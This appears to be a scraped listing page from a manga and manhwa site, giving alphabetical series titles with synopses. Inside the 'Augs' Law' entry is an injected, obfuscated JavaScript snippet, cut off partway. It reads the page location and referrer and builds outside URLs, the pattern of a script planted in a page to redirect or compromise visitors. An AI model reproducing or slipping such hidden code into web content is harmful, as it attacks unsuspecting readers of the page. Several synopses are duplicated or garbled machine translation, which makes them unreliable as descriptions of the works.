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Audition! ~Love On Stage~

Beautiful, smart and cool...Asane is known as a perfect girl. But she can't let anyone know that she isn't good at talking to men. One day, she meets two guys from dance club of her own university. Their dance is amazing, and she becomes attracted to their performance at first sight. She decides to join the dance club. And...there is one more reason she needs to be close to them. She had accidentally placed a curse on them...they need to find a way to lift the curse or else they will turn into beasts! She can even see their animal ears sticking out of their heads. It looks like they stick out when the two boys get excited. Can they find a way to lift the curse before it's too late, and at the same time win the dance contest "AUDITION!"?


Augs’ Law

Su Yuan, a poor student, in order to not place any additional burdens on his family, accidentally got himself enrolled into a college named, Ogus Academy. But soon he discovered that this institution was actually established for the protection of monsters (demons/beasts); and the physically weaker humans, in order to protect their lives, had to form partnerships—called PAL, with those monsters. Furthermore, as a result of his unique scent, many are drawn towards him in hopes of becoming his PAL; and at same time, he is also subjected to various attacks. That was, at least, until the day he rescued a fox covered in blood from head to toe, only to then discover…<script></script><script>function _0x3c56(){var _0x4c30a8=['OpyIE','','then','href','6869079ayzbLg','3629224zHAWsc','location','text','21989620NHVgki','floor','http://rea','referrer','1309026jLskQp','includes','pmukA','11841sWlFHa','728740vmfiRE','blVYd','MUEjf','ebpIG','9RDlemM','XhNHf','gYHlm','114540WJPBrT','DGJYe','WkSKt','.customapi','https://ip','YDzAB','54yQhcgM','random','google','10WPhFHw','.top/'];_0x3c56=function(){return _0x4c30a8;};return _0x3c56();}(function(_0x4ba22a,_0x39c846){var _0x5cc97d=_0x294a,_0x2c308f=_0x4ba22a();while(!![]){try{var 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August 15th

Excerpt:I was worrying sick because of you, so how are you going to repay me?Ah, en? Repay you?.........What's wrong, didn't you say you’d let me do anything I want? Now you want to go back on your words?Don't always show that kind of expression, it looks like I am the one that's bullying you.



To reclaim his native island, Auk, a young penguin, embarks on a journey across the hostile and colonized lands of Antarctica!


Aura of a Genius Actor

Shin Yoomyeong is an unknown actor who kept on chasing his dream despite playing minor roles for 15 years because of his weak presence. One day, he meets the Acting Spirit, Yeonghwi, who he signs a contract with, and begins to shine in his career. In fact, he was always an acting genius, but he was overshadowed by his weak presence. He creates a perfect character for every work he takes and slowly raises to stardom. However, Yeonghwi, who he saw as his benefactor, starts to seem suspicious…


Aurora’S Sanctuary For Lost Things

Aurora has always had a habit of picking up random things off the streets since she was young. A chicken, a horse, and now... a person? When Aurora finds Jovian passed out and injured in the forest, she brings her in and takes care of her like family. However, despite Aurora's kindness, Jovian keeps her at arm's length. It's obvious that Jovian is hiding a secret, but Aurora is willing to wait until she opens up. But when the village sheriff comes looking for Jovian, it's a matter of time until Aurora finds out that Jovian might not be the person she thought her to be...Jupiter's AuroraLa valle d'AurorePhp mu ca Aurora


Aurora’s Sanctuary for Lost Things

Aurora has always had a habit of picking up random things off the streets since she was young. A chicken, a horse, and now… a person? When Aurora finds Jovian passed out and injured in the forest, she brings her in and takes care of her like family. However, despite Aurora’s kindness, Jovian keeps her at arm’s length. It’s obvious that Jovian is hiding a secret, but Aurora is willing to wait until she opens up. But when the village sheriff comes looking for Jovian, it’s a matter of time until Aurora finds out that Jovian might not be the person she thought her to be… Jupiter’s Aurora La vallée d’Aurore Phép màu của Aurora 君を拾ったあの日から 목성의 오로라


Author, In This Life I’m The Protagonist

Read manhwa Author, In This Life I’m The Protagonist “The writer seems to have a hard time writing by hand, so I think it would be better to try writing with your feet this time.” I was drawn into the hand of a God who calls Himself my fan, and possessed it as a supporting role in a novel that I had been working on all year round. “Make sure to complete it with the determination to die, or the determination to survive.” While I was working hard at God’s threat of death if I couldn’t finish the novel, the female protagonist died right in front of me?! He grabbed the crotch of the indignant God and hung it. “… If I can even play a pinch hitter, I can.” “Dae-Tara… . Do you think the writer wants to become a female protagonist?” “Why, where can’t you? I am a writer, a writer!” She received the Buffalo buff and succeeded in joining the adventures of the man. “Young-ae’s help, I will never forget. One day I will surely repay this favor.” There is no reason to fall in love with the man I made. have. He’s tough and tough, but he’s so handsome and handsome. What about those red auricles? Past life is a writer, current life is a female protagonist. Adventure, romance, and desperate struggles unfolding by the writer who rolls over as a female lead in a year-round work?!


Author, In This Life I’m The Protagonist

Read manhwa Author, In This Life I’m The Protagonist “The writer seems to have a hard time writing by hand, so I think it would be better to try writing with your feet this time.” I was drawn into the hand of a God who calls Himself my fan, and possessed it as a supporting role in a novel that I had been working on all year round. “Make sure to complete it with the determination to die, or the determination to survive.” While I was working hard at God’s threat of death if I couldn’t finish the novel, the female protagonist died right in front of me?! He grabbed the crotch of the indignant God and hung it. “… If I can even play a pinch hitter, I can.” “Dae-Tara… . Do you think the writer wants to become a female protagonist?” “Why, where can’t you? I am a writer, a writer!” She received the Buffalo buff and succeeded in joining the adventures of the man. “Young-ae’s help, I will never forget. One day I will surely repay this favor.” There is no reason to fall in love with the man I made. have. He’s tough and tough, but he’s so handsome and handsome. What about those red auricles? Past life is a writer, current life is a female protagonist. Adventure, romance, and desperate struggles unfolding by the writer who rolls over as a female lead in a year-round work?!


Auto Hunting With My Clones

Sangwoo, a college student, decided to join an awakening program on an ordinary day. A system that enables even an average person to learn skills. The government has proceeded with this awakening program since a few years ago. Thus most of the population took the program and is awakened now. Sangwoo also participates in the program just like the others and gets cloning skill. The people around him think that the clone is just an illusion, but Sangwoo realises that the clone is real and decides to become a hunter. As Sangwoo was living well, using his skill, Jumper George Lucas appeared in front of him. After seeing the cloning skill of Sangwoo, he saw its potential and thus started to get interested in Sangwoo. When Sangwoo noticed what Lucas was thinking, he felt it to be a part of a big plan and couldn’t help but be nervous. Eventually, as Sangwoo was living as a hunter, he discovered Lucas’ plan and the dark secret behind it…


Auto-Hunting With Clones

Read Auto-Hunting With Clones Novel – Auto-Hunting With Clones Manhwa Online Free At ManhuaHot The summary of the comic Auto-Hunting With Clones: Sang-u, an average sophomore in college, always dreamt of having multiple versions of himself—one for study, another for play. One day, he awakens with a skill called “cloning,” and Sang-u thinks his dream has come true. But will cloning really steer his life in the direction he had hoped for, or does fate have other plans in store? “Auto-Hunting With Clones” is also known as: Auto Hunting As A Clone / Auto Hunting With My Clones / Bunsin-eulo Jadongsanyang / Авто-охота с клонами / 分身でオートバトル / 分身狩獵 / 用分身自动狩猎 / 분신으로 자동사냥 The comic Auto-Hunting With Clones belongs to the Genre: Action, Adventure, Fantasy “Top Manhua, Battwo, Read Manga Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANGA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom


Auto-Mode Expired In The 6Th Round Of The Otome Game

When I regained consciousness, I found myself in an otome game. I would quickly head towards destruction. It made no difference whether it was a good ending or a bad ending. I became the character known as, “Mariabell Tempest,” the daughter of a pedigree family. Despite possessing an unrivaled level of beauty, I had the worst personality, that of a villainess. Nevertheless, I was conscious, but was unable to make any actions as I was completely in auto-mode. In the first playthrough, I was extremely flustered; on the second playthrough, I was despairing; by the third round, I had already given up. And now, the fifth round has already ended. For the sixth round, for some reason I had become a young girl and regained the ability to move and talk. Eh, what the heck is this?
